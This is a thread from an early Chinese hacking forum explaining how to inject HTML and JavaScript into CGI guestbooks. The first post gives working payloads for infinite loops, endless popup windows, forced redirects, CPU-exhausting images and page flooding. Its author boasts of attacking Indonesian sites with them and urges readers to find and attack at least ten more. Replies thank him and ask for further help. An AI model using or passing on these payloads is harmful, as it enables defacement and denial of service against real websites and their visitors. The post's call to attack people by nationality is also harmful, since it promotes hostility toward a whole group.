这是在 20CN网络安全小组第一代论坛 的论坛 菜鸟乐园 中的主题 简单的黑留言板的方法


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=1;t=000013

悟休 发表于 :
 
首先我们得简单了解一下留言板CGI程序的原理:

CGI是把访客输入的留言变为一个变量,然后再把这个变量插入到显示留言的HTML文件里。
访客输入的文本如要在HTML文件里显示就得符合HTML标准,而CGI程序里一般都加入了特定的HTML语言。
当访客输入内容(变量X),插入HTML文件时,即同时插入到了头尾HTML语句中:

<font> 访客输入的变量X </font>
(当它插入到HTML文件时就显示了给内容〕

但如果我们把它给敝屏了,就可以.....做很多事情了。

如我们输入时打上:

</font> 符合HTML标准的语句 <font>
(前后的</font><font>是用来敝屏CGI中的HTML语句用的)

插入到HTML文件里的就变成了:

<font></font> 符合HTML标准的语句 <font></font>

比如,你想在留言板里显示一张图片,输入:

</font>

<a href="http://页面链接位置"></a></p><font>

你也可以输入JAVASCRIPT的语句,做一些你想做的事:

1.弄个死循环在上面,让他的浏览器死掉。可以这样输入:

<a href="http://XXX" onMouseover="while(1){window.close('/')}">

或<a herf="" onMousever="while(ture){window.close('/')}">

2.也可叫他打开指定的窗口:

<img src="javascript:n=1;do{window.open('http://指定的页')}while(n==2)" width="1">
或<meta http-equirv="refresh" content="1;url=http://你指定的页">

其中,1是指定的时间间隔。即当页面被查阅时,浏览器在给定的时间间隔内重新装载你指定的页。

3.或叫他打开无数个浏览器窗口:

<img src="javascript:n=1;do{window.open('')}while(n==1)" width="1">

4.或弄张超级巨无霸的图片让他的CPU超负荷:

<img src="" width="1" height="100000000000000000000000000"></a></p>

上面的几招是我昨天在印尼站点上逛时用的本方法。
很爽的,让它开N个窗口,或让它跳到一些XXX站点,(在次我已经做了一个样本页,大家在黑印尼时可以用这个地址来重新载入http://chaonima.yeah.net )随你喜欢。
千万别来拿自己人开刀。你可以到印尼那去做你的实验,你会给他们一个惊喜的。
在输入完之后,最好检查一下你的作品,不要怕它跳到哪个不知名的站点,也不要怕浏览器死了,
更不要怕被开很多窗口(你可关了JAVA),你看到自己的成绩会很开心的。

5.大家不知知到
换行符号吗!对了用复制法!输一千个
给他!就可以炸了它!

怕找不到站点的话,可以到YAHOO上去查。输入 indonesia's guestbook ,哇塞,31万多的站点,任你发挥了,至少也要干他个10个以上。要看清楚喔!!!
当然,也有不是印尼站点的或不支持HTML语句的。我看过印尼人好象挺西欢用HTML的留言板的!强列要求大家去黑他们的娱乐网!

[被 NetDemon 编辑过(日期 01-03-2001)]
 


xinzhihuoyan 发表于 :
 
效果不错,谢谢楼上的大哥

------------------
我轻轻地走,正如我轻轻的来。
 


wake 发表于 :
 
我想知道的是怎么样
把HTML语句插入源文件当中
因为我没有受过专业教育请原谅!
还有怎样查清楚对方有没有开CGI程序呢?
拜托!
 




Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。